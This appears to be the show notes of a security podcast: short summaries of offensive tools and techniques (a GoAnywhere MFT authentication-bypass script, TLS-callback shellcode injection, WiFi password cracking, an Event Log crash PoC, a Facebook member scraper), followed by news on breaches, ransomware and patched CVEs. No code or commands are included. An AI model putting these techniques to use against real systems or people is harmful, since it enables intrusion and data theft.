# Latest Podcast
Description
A script to scrape Facebook profiles is out, but beware the risks. Python assists GoAnywhere MFT patching, while a new GitHub repo tracks Linux kernel CVEs. Windows DPAPI insights offer encryption tactics, and Airgorah helps audit WiFi security legally. RemoteTLS leverages TLS callbacks for payload execution without new threads, and vhostawesome optimizes virtual host scanning with threading.Tradecraft
[#]
A script has been detailed that, when run in the Chrome Developer Console, can scrape Facebook group member data, such as profile IDs and names, and export it into a CSV file without needing an extension or proxy.
[#]
A Python script is available for creating a new admin user to bypass authentication in GoAnywhere MFT, following proper usage guidelines and intended solely for research and defensive purposes.
[#]
The nluedtke/linux_kernel_cves repository on GitHub tracks CVEs in the upstream Linux kernel and provides data via a web interface and in JSON/text format on GitHub, aiming to fill the information gap that exists outside of individual distributions' efforts.
[#]
The article details the workings of the Windows Data Protection API (DPAPI) for data encryption and decryption, providing insight into key management, user and system scenarios, and how these mechanisms can be leveraged or targeted for various offensive security operations.
[#]
Airgorah is a Linux-based WiFi auditing tool utilizing the aircrack-ng suite to discover, attack, and crack passwords of WiFi networks legally owned by users, requiring root access and a network card supporting monitor mode and packet injection.
[#]
The RemoteTLS Callback Injection technique allows a payload to execute in a remote process by manipulating TLS callbacks instead of creating new threads, employing steps such as creating a suspended process and injecting shellcode for stealthy payload activation.
[#]
vhostawesome is a tool for scanning IP addresses to identify virtual hosts using threading for concurrent checks, customizable port scans, and a subdomain wordlist to streamline discovery and analysis of web servers.
[#]
The EventLogCrasher is a proof of concept demonstrating how to induce a crash in the Windows Event Log service by sending a malformed UNICODE_STRING object to the ElfrRegisterEventSourceW method via the RPC-based EventLog Remoting Protocol.
News
[#]
Security researcher Bob Diachenko and Cybernews revealed a massive data breach involving over 26 billion records from multiple platforms and public bodies, highlighting the ongoing issue of large-scale data exposure and the importance of robust cyber security practices such as encryption, multifactor authentication, and penetration testing to protect sensitive information.
[#]
The UK's National Cyber Security Centre warns of a future where AI could assist state-backed malware in evading detection, urging organizations to follow their advice on cybersecurity hygiene to enhance defenses against such cyber threats.
[#]
Splunk patched multiple vulnerabilities in its Enterprise platform, including a high-severity path input sanitization issue in Windows installations, specifically recommending updates to versions 9.0.8 or 9.1.3 to prevent potential remote code execution exploits.
[#]
VexTrio, a traffic distribution system active since 2017, controls 70,000 compromised sites redirecting users to malicious content and has long-term affiliations with malware campaigns like ClearFake and SocGholish; users can mitigate risks by using SSL-only sites, blocking browser push notifications, and employing ad-blockers.
[#]
A critical directory traversal flaw, CVE-2024-0221, detected in the widely used WordPress Photo Gallery plugin, can allow attackers to rename files on a server; upgrading to version 1.8.20 mitigates the issue.
[#]
Over 5,300 GitLab servers are at risk of a critical zero-click account takeover due to a flaw, CVE-2023-7028, although patched, many servers remain unsecured, and admins should apply updates and check for compromises immediately.
[#]
X, previously known as Twitter, introduces passkeys for iOS users in the U.S. to bolster account security and reduce phishing risks by using public key cryptography aligned with the WebAuthn standard, without the need for a password or two-factor authentication.
[#]
Security researchers discovered over 18,000 exposed API secret tokens along with $20M in Stripe tokens through a method requiring responsible verification with token owners before issuing alerts to avoid false positives.
[#]
AhnLab reports the distribution of a multifunctional Remote Access Trojan named VenomRAT through a deceptive Word document-style shortcut file that initiates a multi-stage attack to install keylogging and system information theft tools on compromised systems.
[#]
Alphabet's experimental X Lab is facing layoffs and a shift in strategy towards seeking external funding for its moonshot projects to alleviate financial pressures and streamline its focus on viable innovations.
[#]
A threat actor utilized a publicly exposed Trello API to link 15 million private email addresses with Trello user accounts, which led to Trello hardening the API to require authentication and being added to the Have I Been Pwned service for breach verification.
[#]
Apple recently updated iPhones with Stolen Device Protection, which restricts critical changes to the settings when the phone is not in a known location, aiding in thwarting thieves' attempts to exploit stolen devices.
[#]
The Danish Centre for Cyber Security alerts of ransomware exploiting the Cisco VPN flaw CVE-2023-20269 and advises organizations to implement Cisco's recommended updates and security measures.
[#]
The Caravan and Motorhome Club in the UK experienced a significant IT outage starting January 20, 2024, likely due to a cyberattack, leading to service disruptions and an ongoing investigation into possible data compromise.
[#]
A Colorado pastor and his wife are charged with defrauding local Christians of over $3 million in a cryptocurrency scheme by selling them a practically worthless crypto called INDXcoin and using the proceeds for personal luxuries.
[#]
A ransomware attack by Akira on Finnish IT service provider Tietoevry disrupted services for several Swedish entities, and recovery may take weeks due to system complexity and customer-specific restoration needs.
[#]
A cybersecurity researcher discovered a misconfigured cloud database from BuyGoods.com, revealing sensitive customer and KYC data; server access has since been restricted following a notification of the breach.
[#]
Apple has fixed a zero-day in Webkit, CVE-2024-23222, found in a range of Apple devices and operating systems, which could have allowed arbitrary code execution and urges users to update their systems promptly.
[#]
Google Pixel smartphones are experiencing functionality issues such as inaccessible internal storage and inoperable apps after the January 2024 Play system update, with a fix currently under investigation by Google.
[#]
The Kasseika ransomware group, linked to the defunct BlackMatter, is executing BYOVD attacks to disable security tools before encryption, demanding 50 bitcoin ransoms and using legitimate, yet vulnerable drivers in their operations, while the BianLian ransomware shifts tactics from encryption to extortion after decryption tools became available.
[#]
Microsoft confirmed that Russian hackers Cozy Bear compromised a small percentage of their corporate email accounts, including executives and cybersecurity teams, due to insufficient security measures like missing multi-factor authentication, raising concerns over the tech giant's defenses.
[#]
A former senior engineer at Meta, Arturo Béjar, reveals that despite the infrastructure existing to protect young users, Meta has not implemented sufficient measures to prevent teenagers from encountering harmful content on Instagram, following Molly Russell's death linked to self-harm content on the platform.
[#]
Jason's Deli reported a credential stuffing attack potentially impacting over 340,000 customers, prompting the company to restore affected Deli Dollars accounts and investigate the compromised accounts which included personal information but not full payment card numbers.
[#]
A database with approximately 1.3 million sets of Dutch COVID-19 testing records, containing personal and medical information, was found unsecured on the internet and remained exposed for nearly three weeks before being taken offline by the hosting provider.
[#]
Microsoft disclosed a breach by Russian hacker group Cozy Bear who accessed a small percentage of corporate emails using a password spray attack on a non-production legacy account, which could have been prevented with multi-factor authentication.
[#]
Two malicious npm packages, `warbeast2000` and `kodiak2k`, were discovered using GitHub to store stolen SSH keys, highlighting the need for increased security scrutiny of open-source packages.
[#]
An unsecured database containing 1.3 million Dutch COVID-19 testing records, including personal details, was left exposed online and only secured after external intervention, with the responsible parties at CoronaLab and Microbe & Lab unresponsive to breach notifications.
[#]
Jason's Deli reported a credential stuffing attack affecting 344,000 users; customers are advised to change passwords and monitor accounts, while the company steps up security measures including the implementation of Multi-Factor Authentication.
[#]
Kasseika ransomware employs a vulnerable driver from TG Soft's VirtIT Agent System to disable antivirus systems before launching an encryption attack, demanding 50 Bitcoins with penalties for delayed payment.
[#]
Security researchers uncovered a critical vulnerability in Google Kubernetes Engine that allowed any Google account to gain control of clusters; Google has since updated GKE and recommended security practices to mitigate the issue.
